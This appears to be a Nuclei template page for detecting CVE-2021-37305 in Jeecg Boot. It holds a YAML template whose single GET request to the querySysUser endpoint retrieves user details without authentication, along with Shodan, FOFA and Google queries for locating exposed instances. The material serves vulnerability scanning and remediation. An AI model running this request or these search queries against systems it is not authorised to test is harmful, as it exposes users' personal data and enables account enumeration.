Skip to content
Nuclei Templates

Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure

ID: CVE-2021-37305

Severity: high

Author: ritikchaddha

Tags: cve2021,cve,jeecg,exposure

Description

Section titled “Description”

Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.

YAML Source

Section titled “YAML Source”
id: CVE-2021-37305


info:
  name: Jeecg Boot <= 2.4.5 - Sensitive Information Disclosure
  author: ritikchaddha
  severity: high
  description: |
    Jeecg Boot <= 2.4.5 API interface has unauthorized access and leaks sensitive information such as email,phone and Enumerate usernames that exist in the system.
  impact: |
    An attacker can exploit this vulnerability to gain access to sensitive information, potentially leading to unauthorized access or data leakage.
  remediation: |
    Upgrade Jeecg Boot to version 2.4.6 or later to fix the vulnerability.
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/2794
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37305
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-37305
    cwe-id: CWE-732
    epss-score: 0.00416
    epss-percentile: 0.73616
    cpe: cpe:2.3:a:jeecg:jeecg:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: jeecg
    product: jeecg
    shodan-query:
      - title:"Jeecg-Boot"
      - http.title:"jeecg-boot"
    fofa-query:
      - title="JeecgBoot 企业级低代码平台"
      - title="jeecg-boot"
      - title="jeecgboot 企业级低代码平台"
    google-query: intitle:"jeecg-boot"
  tags: cve2021,cve,jeecg,exposure


http:
  - method: GET
    path:
      - "{{BaseURL}}/jeecg-boot/sys/user/querySysUser?username=admin"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'username":"admin'
          - 'success":true'
          - 'result":{'
        condition: and


      - type: word
        part: header
        words:
          - application/json


      - type: status
        status:
          - 200
# digest: 490a0046304402200c432ad1fd8118f50dcb94a3e16cd880beffd6dfb392757519064fc629482396022026cc3f887a1282dd57b9e279c5d78069b8842c32bffb4e5039ede0590354e381:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-37305.yaml"

View on Github